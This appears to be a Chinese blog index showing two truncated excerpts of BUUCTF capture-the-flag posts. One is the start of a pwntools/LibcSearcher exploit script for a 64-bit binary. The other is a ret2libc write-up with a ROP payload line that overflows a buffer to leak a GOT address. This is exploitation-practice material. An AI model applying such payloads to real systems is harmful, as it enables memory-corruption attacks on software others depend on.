exp

March 5, 20261 分钟阅读 BUUBUU

from pwn import * from LibcSearcher import LibcSearcher con=0 if con: print('当前程序是32位的:') sleep(0.3) context(log_level='debug', arch='i386', os='linux') else: print("当前程序是64位的") sleep(0.3) context(log_level='debug', arch='amd64', os='linux') context.terminal = ['tmux', 'splitw', '-h'] local_file = ('./level3_x64') elf...

wp

April 15, 20261 分钟阅读 BUUBUU

好久没做了 一道ret2libc,但看好像还有ret2csu exp:exp 以前libcsearcher里的脚本跟这次的有点区别,以这次的为准, payload = b'A' * offset + p64(ret_addr) + p64(pop_rdi) + p64(1) +p64(pop_rsi) + p64(got) + p64(4) + p64(plt) + p64(main_addr)